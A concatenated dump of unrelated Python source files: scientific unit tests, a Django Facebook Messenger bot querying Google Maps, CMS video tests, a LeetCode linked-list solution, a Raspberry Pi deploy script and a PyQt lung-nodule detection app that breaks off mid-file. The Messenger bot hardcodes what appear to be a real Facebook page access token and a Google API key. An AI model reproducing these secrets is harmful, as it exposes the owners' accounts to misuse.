self.database)\r\n        get_all_normalmodes(self.system, self.database)\r\n        \r\n\r\n        self.minima = list(self.database.minima())\r\n        assert self.database.number_of_minima() > 1, \"%d minima\" % self.database.number_of_minima()\r\n        \r\n        self.mc_runner = self.system.get_mc_walker(mciter=200)\r\n\r\n        self.energy_accuracy = 1e-4\r\n        self.ns = NestedSamplingSAExact(self.system, self.nreplicas, self.mc_runner,\r\n                                        self.minima, self.energy_accuracy, \r\n                                        mindist=self.system.get_mindist(),\r\n                                        config_tests = self.system.get_config_tests(),\r\n                                        stepsize=0.1, nproc=nproc, verbose=True, iprint=100)\r\n        \r\n        self.Emax0 = self.ns.replicas[-1].energy\r\n        \r\n        self.run_ns(max_iter=1000, Etol=.001)\r\n        \r\n\r\n    \r\n    def test1(self):\r\n        super(TestSENSExact_LJ, self).test1()\r\n        self.assertGreater(self.ns.count_sampled_minima, 0)\r\n        \r\n#        T, cv = self.compute_cv()\r\n#        import matplotlib.pyplot as plt\r\n##        plt.plot(cv)\r\n#        print cv.shape\r\n#        plt.plot(T, cv)\r\n#        plt.show()\r\n    \r\n    \r\n    \r\n\r\nclass TestSENSExact_LJ_Par(TestSENSExact_LJ):\r\n    def setUp(self):\r\n        self.setUp1(nproc=3)\r\n    \r\n    \r\nif __name__ == \"__main__\":\r\n    unittest.main() \r\n","sub_path":"sens/tests/_test_sens_exact_lj.py","file_name":"_test_sens_exact_lj.py","file_ext":"py","file_size_in_byte":2430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"93694453","text":"from django.shortcuts import render\r\nfrom django.views import generic\r\nfrom django.http.response import HttpResponse\r\nfrom django.utils.decorators import method_decorator\r\nfrom django.views.decorators.csrf import csrf_exempt\r\nfrom chatterbot import ChatBot\r\nfrom chatterbot.trainers import ChatterBotCorpusTrainer\r\nfrom hanziconv import HanziConv\r\nfrom django.conf import settings\r\nfrom urllib.parse import quote\r\nimport json, requests, re, random, os, sys, string\r\nimport jieba, jieba.posseg , jieba.analyse\r\nimport urllib.request\r\n\r\n\r\n# API for the Facebook page 胖狗狗的白白肚肚 https://goo.gl/WEjQQK\r\nPAGE_ACCESS_TOKEN = \"EAAB09UKvWGsBAFsrGU5hpRfJRQHMFPMSHNV8D9TvIKpqvhLkkKCUJgIhJHQZABsqadPckRxeBxsadZAq6RSMeBHdskcwP0hnLyKEoWsWXCQWx1hrrXZAz6PXeKQnTkYpPOhPoFJtDXf3z60U6N6PlBl9ZBXAnJWlM03ZBl9JqhAZDZD\"\r\nGM_API_KEY = 'AIzaSyA35lPzOmBYaGtsGnu1BtuZiWqZcLpYdQk'\r\n\r\n\r\nclass GMBotView(generic.View):\r\n\t\t# In class-based views, args holds two elements: the first is self, the second is request\r\n\t\t# *args collects extra positional values, packed as a tuple in Python\r\n\t\t# **kwargs collects keyword arguments as a dictionary\r\n\r\n    def get(self, request, *args, **kwargs):\r\n    \t# Verify Token = botprojecttest\r\n    \tif self.request.GET['hub.verify_token'] == 'botprojecttest':\r\n    \t\treturn HttpResponse(self.request.GET['hub.challenge'])\r\n    \telse:\r\n    \t\treturn HttpResponse('Error, invalid token')\r\n\r\n\t# The get method is the same as before.. 
omitted here for brevity\r\n @method_decorator(csrf_exempt)\r\n def dispatch(self, request, *args, **kwargs):\r\n return generic.View.dispatch(self, request, *args, **kwargs)\r\n\r\n # Post function to handle Facebook messages\r\n # 將接收到的文字內容以Json形式讀取,而後轉為字串\r\n def post(self, request, *args, **kwargs):\r\n # Converts the text payload into a python dictionary\r\n incoming_message = json.loads(self.request.body.decode('utf-8'))\r\n # Facebook recommends going through every entry since they might send\r\n # multiple messages in a single call during high load\r\n for entry in incoming_message['entry']:\r\n for message in entry['messaging']:\r\n # Check to make sure the received call is a message call\r\n # This might be delivery, optin, postback for other events \r\n if 'message' in message:\r\n # Print the message to the terminal\r\n\r\n if 'text' in message ['message']:\r\n\r\n # Assuming the sender only sends text. Non-text messages like stickers, audio, pictures\r\n # are sent as attachments and must be handled accordingly. \r\n post_facebook_message_text(message['sender']['id'], message['message']['text']) \r\n \r\n\r\n return HttpResponse()\r\n\r\n\r\ndef message_contents(fbid, sentence):\r\n \r\n # recevied_message = \"\"\r\n post_message_url = 'https://graph.facebook.com/v2.6/me/messages?access_token=%s'%PAGE_ACCESS_TOKEN\r\n \r\n\r\n # print(\"===========\" + sentence + \"=================\")\r\n # GM_id = GMap_place_idsearch(sentence)\r\n # print(\"===========\" + GM_id + \"=================\")\r\n # response_msg = json.dumps({\"recipient\":{\"id\":fbid},\"message\":{\"text\":GMap_place_detailssearch(GM_id)[2]}})\r\n # response_msg = json.dumps({\"recipient\":{\"id\":fbid},\"message\":{\"text\":GMap_place_detailssearch(sentence)[2]}})\r\n response_msg = json.dumps({\"recipient\":{\"id\":fbid},\"message\":{\"text\":\"輸入的文字為:\" + sentence}})\r\n \r\n status = requests.post(post_message_url, headers = {\"Content-Type\": \"application/json\"}, data = response_msg)\r\n # post_facebook_message_media(fbid, GMap_map(sentence)) \r\n\r\n\r\n\r\n# 建立可回應至FB之函數(文字)\r\ndef post_facebook_message_text(fbid, recevied_message):\r\n\r\n\t# 抓取傳送者名稱\r\n\t# 使用:user_details['first_name']\r\n user_details_url = \"https://graph.facebook.com/v2.6/%s\"%fbid\r\n user_details_params = {'fields':'first_name,last_name,profile_pic', 'access_token':PAGE_ACCESS_TOKEN}\r\n user_details = requests.get(user_details_url, user_details_params).json()\r\n\r\n message_contents(fbid, recevied_message)\r\n\r\n\r\ndef post_facebook_message_media(fbid, imgurl):\r\n post_message_url = 'https://graph.facebook.com/v2.6/me/messages?access_token=%s'%PAGE_ACCESS_TOKEN\r\n response_msg = json.dumps({\"recipient\":{\"id\":fbid}, \"message\":{\"attachment\":{\"type\":\"image\", \"payload\":{\"url\":imgurl}}}})\r\n status = requests.post(post_message_url, headers = {\"Content-Type\": \"application/json\"},data = response_msg)\r\n # print(status.json())\r\n\r\n# Google Static Maps\r\ndef GMap_map(center):\r\n\r\n endpoint = \"https://maps.googleapis.com/maps/api/staticmap?\"\r\n GM_API_KEY = 'AIzaSyA35lPzOmBYaGtsGnu1BtuZiWqZcLpYdQk'\r\n\r\n G_center = center.replace(' ', '+')\r\n G_zoom = \"16\"\r\n G_size = \"250x250\"\r\n G_markers = \"color:red%7C\"+ G_center\r\n\r\n nav_request = 'center={}&zoom={}&size={}&markers={}&key={}'.format(G_center, G_zoom, G_size, G_markers, GM_API_KEY)\r\n G_request = endpoint + nav_request\r\n return G_request\r\n\r\n\r\n# Google Places API Web Service Search\r\ndef GMap_place_idsearch(center):\r\n\r\n 
endpoint = \"https://maps.googleapis.com/maps/api/place/textsearch/json?\"\r\n GM_API_KEY = 'AIzaSyA35lPzOmBYaGtsGnu1BtuZiWqZcLpYdQk'\r\n\r\n G_query = center.replace(' ', '+')\r\n G_language = 'zh-TW'\r\n\r\n nav_request = 'query={}&language={}&key={}'.format(G_query, G_language, GM_API_KEY)\r\n\r\n request = endpoint + nav_request\r\n # url中不可包含中文等無法處理之字→需轉換成「%XX」\r\n # urllib.parse.quote(string, safe='/', encoding=None, errors=None)\r\n # https://www.zhihu.com/question/22899135 https://docs.python.org/3/library/urllib.parse.html#url-quoting。 \r\n request_trans = urllib.parse.quote(request, safe = string.printable)\r\n\r\n\r\n # 新增標頭檔偽裝伺服器 (Error:'latin-1' codec can't encode character '\\u015f' in position 54: ordinal not in range(256))\r\n # header = {'user-agent':\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/\\537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36\"}\r\n # req = urllib.request.Request(request_trans, headers = header)\r\n # respone = urllib.request.urlopen(req).read()\r\n\r\n print (request_trans)\r\n\r\n respone = urllib.request.urlopen(request_trans).read()\r\n directions = json.loads(respone.decode('utf-8'))\r\n\r\n results = directions['results']\r\n # response = results[0]['name'] + '的地址是:' + results[0]['formatted_address']\r\n\r\n # print ('===results=====' + results[0])\r\n \r\n response = results[0]['place_id']\r\n\r\n print ('===response===' + response)\r\n\r\n # print (results[0]['name'] + '的地址是:' + results[0]['formatted_address'])\r\n return response\r\n\r\n\r\n# Google Places API Web Service Details\r\ndef GMap_place_detailssearch(query):\r\n \r\n endpoint = \"https://maps.googleapis.com/maps/api/place/details/json?\"\r\n GM_API_KEY = 'AIzaSyA35lPzOmBYaGtsGnu1BtuZiWqZcLpYdQk'\r\n\r\n G_language = 'zh-TW'\r\n nav_request = 'placeid={}&language={}&key={}'.format(query, G_language, GM_API_KEY)\r\n request = endpoint + nav_request\r\n\r\n print(request)\r\n\r\n respone = urllib.request.urlopen(request).read()\r\n directions = json.loads(respone.decode('utf-8'))\r\n\r\n\r\n result = directions['result']\r\n\r\n\r\n # google可抓取類別:名稱、電話、地址、營業時間、評價、網站、googlemap頁面\r\n\r\n P_name = result['name']\r\n\r\n if 'formatted_phone_number' in result :\r\n P_phone = result['formatted_phone_number']\r\n else :\r\n P_phone = '您所查詢的地點暫無電話資訊!'\r\n\r\n if 'formatted_address' in result :\r\n P_address = result['formatted_phone_number']\r\n else :\r\n P_address = '您所查詢的地點暫無地址資訊!'\r\n\r\n # 營業時間回傳值為list\r\n if 'opening_hours' in result :\r\n P_time = ''\r\n for i in range(0,7):\r\n P_time += re['opening_hours']['weekday_text'][i] + '\\n'\r\n else :\r\n P_time = '您所查詢的地點暫無營業時間資訊!'\r\n \r\n if 'rating' in result :\r\n P_grade = result['rating']\r\n else :\r\n P_grade = '您所查詢的地點暫無評價資訊!'\r\n\r\n if 'website' in result :\r\n P_web = result['website']\r\n else :\r\n P_web = '您所查詢的地點暫無網站資訊!'\r\n\r\n P_GMweb = result['url']\r\n\r\n response = [ P_name, P_phone, P_address, P_time, P_grade, P_web, P_GMweb ]\r\n\r\n print (response)\r\n\r\n return response\r\n # return result\r\n","sub_path":"1221 MessengerBot_Googlemap/chatbot/chatbot/Scripts/testbot/GooglemapBot/views - 複製.py","file_name":"views - 複製.py","file_ext":"py","file_size_in_byte":8524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"578776111","text":"# -*- coding: utf-8 -*-\nimport lxml.objectify\nimport pytest\nimport zeit.cms.content.interfaces\nimport zeit.cms.content.sources\nimport zeit.content.video.interfaces\nimport zeit.content.video.testing\nimport 
zeit.content.video.video\nimport zope.component\n\n\nclass TestVideo(zeit.content.video.testing.TestCase):\n\n def test_security_should_allow_access_to_id_prefix(self):\n import zeit.cms.testing\n import zope.security.management\n from zope.security.proxy import ProxyFactory\n factory = zeit.content.video.testing.video_factory(self)\n factory.next()\n video = factory.next() # in repository\n zope.security.management.endInteraction()\n with zeit.cms.testing.interaction('zope.mgr'):\n proxied = ProxyFactory(video)\n self.assertEqual('vid', proxied.id_prefix)\n\n def test_has_advertisement_defaults_to_true(self):\n # For bw-compat to videos imported before we recognized the field.\n factory = zeit.content.video.testing.video_factory(self)\n video = factory.next()\n self.assertEqual(True, video.has_advertisement)\n\n\n@pytest.mark.parametrize(\n 'title,supertitle,result', [\n (u'Äch bön oin Börlünär.', u'Kennedy said:',\n u'kennedy-said-aech-boen-oin-boerluenaer'),\n (None, u'Kennedy said:', u'kennedy-said'),\n (u'Äch bön oin Börlünär.', None, u'aech-boen-oin-boerluenaer')])\ndef test_seo_slug_returns_url_normalized_version_of_title_and_supertitle(\n title, supertitle, result):\n video = zeit.content.video.video.Video()\n video.title = title\n video.supertitle = supertitle\n assert result == video.seo_slug\n\n\nclass TestReference(zeit.content.video.testing.TestCase):\n\n def setUp(self):\n super(TestReference, self).setUp()\n self.node = lxml.objectify.XML(\n '')\n\n def create_video(self, **kw):\n factory = zeit.content.video.testing.video_factory(self)\n factory.next()\n factory.next() # video is now in repository['video']\n player = zope.component.getUtility(\n zeit.content.video.interfaces.IPlayer)\n player.get_video.return_value.update(kw)\n\n def update(self, node):\n updater = zeit.cms.content.interfaces.IXMLReferenceUpdater(\n self.repository['video'])\n updater.update(node)\n\n def test_still_should_be_contained_in_xml_reference(self):\n self.create_video(video_still='http://stillurl')\n self.update(self.node)\n self.assertEqual(\n 'http://stillurl', self.node['video-still'].get('src'))\n\n def test_thumbnail_should_be_contained_in_xml_reference(self):\n self.create_video(thumbnail='http://thumbnailurl')\n self.update(self.node)\n self.assertEqual(\n 'http://thumbnailurl', self.node['thumbnail'].get('src'))\n\n def test_nodes_should_be_removed_from_reference(self):\n self.create_video(\n video_still='http://stillurl', thumbnail='http://thumbnailurl')\n self.update(self.node)\n self.create_video(video_still=None, thumbnail=None)\n self.update(self.node)\n self.assertRaises(AttributeError, lambda: self.node['video-still'])\n self.assertRaises(AttributeError, lambda: self.node['thumbnail'])\n\n\nclass TestAuthorshipsProperty(zeit.content.video.testing.TestCase):\n\n def test_authorships_property_converts_IAuthor_to_IReference(\n self):\n from zeit.cms.content.interfaces import IReference\n from zeit.content.author.author import Author\n from zeit.content.video.video import Video\n self.repository['author'] = Author()\n video = Video()\n video.authorships = (self.repository['author'],)\n self.assertEqual(\n [True], [IReference.providedBy(x) for x in video.authorships])\n self.assertEqual(\n [self.repository['author']], [x.target for x in video.authorships])\n\n def test_authorships_property_passes_IReference_without_conversion(self):\n from zeit.cms.content.interfaces import IReference\n from zeit.content.author.author import Author\n from zeit.content.video.video import Video\n 
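The parametrized `seo_slug` cases in this record pin down how `supertitle` and `title` collapse into a URL slug: supertitle first, umlauts transliterated, everything lowercased and hyphen-joined, `None` fields dropped. As a rough illustration — the real normalizer lives elsewhere in zeit.cms and is not shown in this file, so the transliteration table below is an assumption — a minimal sketch that reproduces all three expected values:

```python
# A rough sketch of the slug rule the parametrized cases encode; the
# transliteration table is an assumption, not zeit.cms's actual normalizer.
import re

TRANSLIT = {'ä': 'ae', 'ö': 'oe', 'ü': 'ue', 'ß': 'ss'}

def seo_slug(title, supertitle):
    parts = [p for p in (supertitle, title) if p]  # None fields drop out
    text = ' '.join(parts).lower()
    for src, dst in TRANSLIT.items():
        text = text.replace(src, dst)
    text = re.sub(r'[^a-z0-9]+', '-', text)  # collapse punctuation and spaces
    return text.strip('-')

assert seo_slug('Äch bön oin Börlünär.', 'Kennedy said:') == \
    'kennedy-said-aech-boen-oin-boerluenaer'
assert seo_slug(None, 'Kennedy said:') == 'kennedy-said'
assert seo_slug('Äch bön oin Börlünär.', None) == 'aech-boen-oin-boerluenaer'
```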
self.repository['author'] = Author()\n video = Video()\n video.authorships = (\n video.authorships.create(self.repository['author']),)\n self.assertEqual(\n [True], [IReference.providedBy(x) for x in video.authorships])\n self.assertEqual(\n [self.repository['author']], [x.target for x in video.authorships])\n","sub_path":"src/zeit/content/video/tests/test_video.py","file_name":"test_video.py","file_ext":"py","file_size_in_byte":4675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"523360482","text":"# 给你单链表的头指针 head 和两个整数 left 和 right ,其中 left <= right 。请你反转从位置 left 到位置 right 的链\r\n# 表节点,返回 反转后的链表 。\r\n#\r\n#\r\n# 示例 1:\r\n#\r\n#\r\n# 输入:head = [1,2,3,4,5], left = 2, right = 4\r\n# 输出:[1,4,3,2,5]\r\n#\r\n#\r\n# 示例 2:\r\n#\r\n#\r\n# 输入:head = [5], left = 1, right = 1\r\n# 输出:[5]\r\n#\r\n#\r\n#\r\n#\r\n# 提示:\r\n#\r\n#\r\n# 链表中节点数目为 n\r\n# 1 <= n <= 500\r\n# -500 <= Node.val <= 500\r\n# 1 <= left <= right <= n\r\n#\r\n#\r\n#\r\n#\r\n# 进阶: 你可以使用一趟扫描完成反转吗?\r\n# Related Topics 链表\r\n# 👍 955 👎 0\r\n\r\nfrom typing import List\r\n# Definition for singly-linked list.\r\nclass ListNode:\r\n def __init__(self, val=0, next=None):\r\n self.val = val\r\n self.next = next\r\n\r\n def generate(self, vals: List):\r\n if not vals:\r\n return None\r\n head = ListNode(vals[0])\r\n cur = head\r\n for i in range(1, len(vals)):\r\n cur.next = ListNode(vals[i])\r\n cur = cur.next\r\n cur.next = None\r\n return head\r\n\r\n# leetcode submit region begin(Prohibit modification and deletion)\r\nclass Solution:\r\n def reverseBetween(self, head: ListNode, left: int, right: int) -> ListNode:\r\n dummy = ListNode(0)\r\n dummy.next = head\r\n count = 1\r\n pre = dummy\r\n if not head or not head.next: # 如果链表非空或只有一个元素,则直接返回head\r\n return head\r\n while count < left: # 找到left位置的前一个元素\r\n pre = pre.next\r\n count += 1\r\n cur = pre.next # cur表示需要反转的元素\r\n tail = pre # 将tail指针固定在left前一位置\r\n while cur.next and count < right: # 遍历left至right之间的元素,利用头插法进行反转\r\n nxt = cur.next # 储存cur的下一节点\r\n cur.next = nxt.next\r\n nxt.next = tail.next\r\n tail.next = nxt\r\n count += 1\r\n return dummy.next\r\n# leetcode submit region end(Prohibit modification and deletion)\r\n\r\nsolution = Solution()\r\nlistnode = ListNode()\r\nl1 = listnode.generate([1,2,3,4,5])\r\nk = solution.reverseBetween(l1,2,4)\r\nwhile k:\r\n print(k.val)\r\n k = k.next\r\n\r\n","sub_path":"[92]反转链表2.py","file_name":"[92]反转链表2.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"615858596","text":"from paramiko import SSHClient, AutoAddPolicy\nfrom scp import SCPClient\nimport argparse\nimport time\n\nfiles = [\"magic_numbers.py\", \"connection.py\", \"camera_manager.py\", \"utilities\"]\n\nparser = argparse.ArgumentParser(\n \"Upload code to the Pi. Only one option (power-port or loading-bay) can be used. 
IP defaults to 10.47.74.11\"\n)\nparser.add_argument(\n    \"-lb\", \"--loading-bay\", help=\"Upload loading bay code\", action=\"store_true\"\n)\nparser.add_argument(\n    \"-pp\", \"--power-port\", help=\"Upload power port code\", action=\"store_true\"\n)\nparser.add_argument(\"-i\", \"--initial\", help=\"Set pi to use Python\", action=\"store_true\")\nparser.add_argument(\"-ip\", \"--ip\", help=\"Specify a custom ip\")\nargs = parser.parse_args()\n\n\nif args.loading_bay and args.power_port:\n    parser.print_help()\n    quit()\n\nelif args.loading_bay:\n    main_file = \"loading_bay_vision.py\"\n    print(\"Deploying Loading Bay code\")\n\nelif args.power_port:\n    main_file = \"power_port_vision.py\"\n    print(\"Deploying Power Port code\")\n\nelse:\n    parser.print_help()\n    quit()\n\nserver_ip = \"10.47.74.11\" if args.ip is None else args.ip\nusername = \"pi\"\npassword = \"raspberry\"\n\nssh = SSHClient()\nssh.set_missing_host_key_policy(AutoAddPolicy())\nprint(f\"Connecting to the pi at {server_ip} ... \", end=\"\")\nssh.connect(server_ip, username=username, password=password)\nprint(\"Done\")\n\nprint(\"Turning off vision ... \", end=\"\")\nssh.exec_command(\"sudo svc -d /service/camera\")\nprint(\"Done\")\n\nprint(\"Making file system writable ... \", end=\"\")\n# paramiko's exec_command returns (stdin, stdout, stderr) in that order\nstdin, stdout, stderr = ssh.exec_command(\n    \"sudo mount -o remount,rw / ; sudo mount -o remount,rw /boot\"\n)\nfor line in stderr:\n    print(line)\nexit_status = stdout.channel.recv_exit_status()\nif exit_status != 0:\n    print(f\"Something's gone wrong! Error exit status: {exit_status}\")\n    quit()\nelse:\n    print(\"Done\")\n\nprint(\"Uploading files ... \", end=\"\")\nscp = SCPClient(ssh.get_transport())\nif args.initial:\n    scp.put(\"runCamera\")\n    ssh.exec_command(\"chmod 755 runCamera\")\nscp.put(files, recursive=True)\nscp.put(main_file, remote_path=\"~/uploaded.py\")\nprint(\"Done\")\n\nprint(\"Making file system read-only ... \", end=\"\")\nssh.exec_command(\"sudo mount -o remount,ro / ; sudo mount -o remount,ro /boot\")\nprint(\"Done\")\n\nprint(\"Turning on vision ... 
\", end=\"\")\nssh.exec_command(\"sudo svc -u /service/camera\")\nprint(\"Done\")\n\nscp.close()","sub_path":"deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":2338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"453101276","text":"# cocoding: utf-8\n# Team : JiaLiDun University\n# Author:zl\n# Date :2021/3/30 0030 下午 3:23\n# Tool :PyCharm\nimport sys\nfrom ui import Ui_Form\nfrom PyQt5.QtCore import Qt, QThread, pyqtSlot, pyqtSignal\nfrom PyQt5.QtWidgets import QWidget, QGraphicsScene, QGraphicsTextItem, QMessageBox, QGraphicsPixmapItem, \\\n QApplication,QFileDialog,QDialog,QGraphicsView\nfrom PyQt5.QtGui import QIcon, QFont, QDragEnterEvent, QImage, QResizeEvent, QPixmap, QCloseEvent,QMouseEvent\nimport re, os, cv2\nimport numpy as np\nimport configparser\nimport prediction\nimport shutil\nimport random\n\n\nfiletype='*.png *.jpg' #定义接受的图片类型\n\ndef clean_dir(path): #清除path目录下的所有文件,用于清空临时目录\n \"\"\"\n 删除某一目录下的所有文件或文件夹\n :param filepath: 路径\n :return:\n \"\"\"\n del_list = os.listdir(path)\n for f in del_list:\n file_path = os.path.join(path, f)\n if os.path.isfile(file_path):\n os.remove(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path) #清除pa #清除path目录下的\n\nclass MyBatchDoThread(QThread): #继承qthread类,重写run方法,使用线程处理目录中的所有文件,防止界面卡死\n rightSignal = pyqtSignal(str)\n wrongSignal = pyqtSignal(str)\n infoSignal=pyqtSignal(str)\n workdir=pyqtSignal(str)\n\n CHANNEL_COUNT = pyqtSignal(int)\n _3DCNN_WEIGHTS = pyqtSignal(str)\n UNET_WEIGHTS = pyqtSignal(str)\n THRESHOLD = pyqtSignal(int)\n BATCH_SIZE = pyqtSignal(int)\n temp_dir = pyqtSignal(str)\n\n\n def __init__(self,parent=None):\n super(MyBatchDoThread,self).__init__()\n\n def __del__(self):\n print('del')\n try:\n self.destroyed()\n except Exception as e:\n print(e)\n\n def run(self):\n \n prediction.CHANNEL_COUNT = self.CHANNEL_COUNT\n prediction._3DCNN_WEIGHTS = self._3DCNN_WEIGHTS\n prediction.UNET_WEIGHTS = self.UNET_WEIGHTS\n prediction.THRESHOLD = self.THRESHOLD\n prediction.BATCH_SIZE = self.BATCH_SIZE\n prediction.temp_dir = self.temp_dir\n\n self.normalDir = os.path.join(self.workdir, 'normal')\n self.noticeDir = os.path.join(self.workdir, 'notice')\n\n if not os.path.exists(self.normalDir):\n os.makedirs(self.normalDir)\n if not os.path.exists(self.noticeDir):\n os.makedirs(self.noticeDir)\n\n if not os.listdir(self.normalDir)==[]:\n clean_dir(self.normalDir)\n\n if not os.listdir(self.noticeDir)==[]:\n clean_dir(self.noticeDir)\n\n self.infoSignal.emit('开始批处理,工作目录为:{}'.format(self.workdir))\n\n if os.path.isdir(self.workdir):\n\n for f in os.listdir(self.workdir):\n filename,ext=os.path.splitext(f)\n if ext=='':\n continue\n if ext not in filetype:\n continue\n\n file=os.path.join(self.workdir,f)\n workfile=os.path.join(self.temp_dir,f)\n prediction.temp_file1=os.path.join(self.temp_dir,filename+'-temp1'+ext)\n temp_file2=os.path.join(self.temp_dir,filename+'-result'+ext)\n \n img = cv2.imdecode(np.fromfile(file, dtype=np.uint8), cv2.IMREAD_COLOR)\n h, w, tunnel = img.shape\n if h != w or h != 320 or w != 320:\n img = cv2.resize(img, (320, 320))\n #cv2.imwrite(workfile, img)\n cv2.imencode('.png', img)[1].tofile(workfile)\n else:\n shutil.copy(file,workfile)\n\n print(prediction.temp_file1)\n\n print(os.path.abspath(prediction.UNET_WEIGHTS))\n prediction.unet_predict(workfile)\n centers = prediction.unet_candidate_dicom(prediction.temp_file1)\n\n print('y, x', centers)\n if len(centers) > 0:\n imgSource = 
cv2.imdecode(np.fromfile(file, dtype=np.uint8), cv2.IMREAD_COLOR)\n # cv2.IMREAD_COLOR:默认参数,读入一副彩色图片,忽略alpha通道\n # cv2.IMREAD_GRAYSCALE:读入灰度图片\n # cv2.IMREAD_UNCHANGED:顾名思义,读入完整图片,包括alpha通道\n imgTarget=img.copy()\n for pos in centers:\n y, x = pos\n cv2.circle(imgTarget, center=(x, y), radius=8, color=(0, 0, 255), thickness=2, lineType=cv2.LINE_AA)\n \n res = np.hstack([imgSource, imgTarget])\n #cv2.imwrite(temp_file2, res)\n cv2.imencode('.png', res)[1].tofile(temp_file2)\n\n shutil.move(file,self.noticeDir)\n shutil.move(temp_file2,self.noticeDir)\n self.wrongSignal.emit('注意:'+file)\n if len(centers) == 0:\n shutil.move(file,self.normalDir)\n self.rightSignal.emit('正常:'+file)\n self.infoSignal.emit('处理完成') #\n\nclass MySingleDoThread(QThread): ##继承qthread类,重写run方法,使用线程处理单个文件,防止界面卡死\n\n rightSignal = pyqtSignal(str)\n wrongSignal = pyqtSignal(str)\n\n CHANNEL_COUNT = pyqtSignal(int)\n _3DCNN_WEIGHTS = pyqtSignal(str)\n UNET_WEIGHTS = pyqtSignal(str)\n THRESHOLD = pyqtSignal(int)\n BATCH_SIZE = pyqtSignal(int)\n temp_dir = pyqtSignal(str)\n temp_file1 = pyqtSignal(str)\n temp_file2 = pyqtSignal(str)\n source = pyqtSignal(str)\n\n def __init__(self, parent=None):\n super(MySingleDoThread, self).__init__()\n\n def run(self):\n prediction.CHANNEL_COUNT = self.CHANNEL_COUNT\n prediction._3DCNN_WEIGHTS = self._3DCNN_WEIGHTS\n prediction.UNET_WEIGHTS = self.UNET_WEIGHTS\n prediction.THRESHOLD = self.THRESHOLD\n prediction.BATCH_SIZE = self.BATCH_SIZE\n prediction.temp_dir = self.temp_dir\n prediction.temp_file1 = self.temp_file1\n prediction.temp_file2 = self.temp_file2\n # # self.stopSignal=False\n\n\n img = cv2.imdecode(np.fromfile(self.source, dtype=np.uint8), cv2.IMREAD_COLOR)\n\n h, w, tunnel = img.shape\n\n if h != w or h != 320 or w != 320:\n img = cv2.resize(img, (320, 320))\n print(img.shape)\n #cv2.imwrite(self.source, img)\n cv2.imencode('.png', img)[1].tofile(self.source)\n\n prediction.unet_predict(self.source)\n centers = prediction.unet_candidate_dicom(self.temp_file1)\n\n print('y, x', centers)\n if len(centers) > 0:\n img = cv2.imdecode(np.fromfile(self.source, dtype=np.uint8), cv2.IMREAD_COLOR)\n # cv2.IMREAD_COLOR:默认参数,读入一副彩色图片,忽略alpha通道\n # cv2.IMREAD_GRAYSCALE:读入灰度图片\n # cv2.IMREAD_UNCHANGED:顾名思义,读入完整图片,包括alpha通道\n for pos in centers:\n y, x = pos\n cv2.circle(img, center=(x, y), radius=8, color=(0, 0, 255), thickness=2, lineType=cv2.LINE_AA)\n #cv2.imwrite(self.temp_file2, img)\n cv2.imencode('.png', img)[1].tofile(self.temp_file2)\n self.wrongSignal.emit('异常')\n\n if len(centers) == 0:\n self.rightSignal.emit('正常')\n\nclass MyDialog(QDialog): #定义子类,用于显示处理结果图片\n \n def __init__(self):\n super(QDialog,self).__init__()\n self.setWindowFlags(Qt.FramelessWindowHint| Qt.Tool) #去除窗口边框,去除关闭,最大化扥按钮\n self.accept()\n \n def mouseDoubleClickEvent(self, a0: QMouseEvent) -> None: #重写双击事件,双击关闭本对话框\n print('destroy1')\n\n self.destroy()\n self.close()\n \n def mousePressEvent(self, a0: QMouseEvent) -> None: #重写单击事件,单击关闭本对话框\n print('destroy1')\n self.destroy()\n self.close()\n\n \n def releaseMouse(self) -> None:\n pass\n\nclass App(QWidget, Ui_Form):\n def __init__(self):\n super(App, self).__init__()\n self.setupUi(self)\n self.setWindowTitle(\"肺结节检测\")\n self.setWindowIcon(QIcon('./model/ico.ico'))\n self.toSingleOutput(content='程序初始化中...')\n self.input_view.setAcceptDrops(True)\n\n self.setWindowFlags(Qt.WindowMinimizeButtonHint | Qt.WindowCloseButtonHint)\n self.setFixedSize(self.width(), self.height())\n\n self.workfile = ''\n self.batch_dir=os.path.abspath('./batchdir')\n if not 
os.path.exists(self.batch_dir):\n os.makedirs(self.batch_dir)\n self.batchDirLineEdit.setText(self.batch_dir)\n self.font = QFont()\n self.font.setPixelSize(100)\n self.fileType = filetype\n self.toSingleOutput(content='初始化完成,请打开或直接拖入图像...,目前只接受{}文件'.format(self.fileType))\n self.toBatchOutput(strings='初始化完成')\n self.toBatchOutput(strings='选择文件夹,点击开始批量处理')\n self.toBatchOutput(strings='请储存好原始影像文件,处理过程可能会造成影像文件被修改')\n self.toBatchOutput(strings='注意请备份normal、notice下的所有文件,执行过程会清空原有文件')\n self.colorThemes = {\n '杏仁黄': (250, 249, 222),\n '秋叶褐': (255, 242, 226),\n '极光灰': (234, 234, 239),\n '青草绿': (227, 237, 205),\n '海天蓝': (220, 226, 241),\n '葛巾紫': (233, 235, 254),\n }\n\n self.OpacitySlider.valueChanged.connect(self.changePactiy)\n self.normalTextEdit.clicked.connect(self.checkItem)\n self.noticeTextEdit.clicked.connect(self.checkItem)\n \n\n for i in [self.radioButton_1, self.radioButton_2, self.radioButton_3, self.radioButton_4, self.radioButton_5,\n self.radioButton_6]:\n i.clicked.connect(self.setColorTheme)\n\n self.loadConfig()\n self.setStyleSheet(\"background-color: rgb{};\".format(str(self.colorThemes[self.colorTheme])))\n print(self.colorTheme, \"background-color: rgb{};\".format(str(self.colorThemes[self.colorTheme])))\n\n def mousePressEvent(self, event) -> None:\n try:\n self.popWindow.destroy()\n print(event)\n except Exception as e:\n print(e)\n\n def changePactiy(self, value):\n self.setWindowOpacity(value / 100)\n\n def loadConfig(self): #读取配置文件,根据配置文件中的配置设置透明度,颜色,程序各种参数\n\n path = './config.ini'\n config = configparser.ConfigParser()\n if os.path.exists(path):\n try:\n config.read(path, encoding='gbk')\n except configparser.MissingSectionHeaderError as e:\n self.toSingleOutput(message='配置文件无任何section,请检查配置文件')\n sys.exit(1)\n except Exception as e:\n 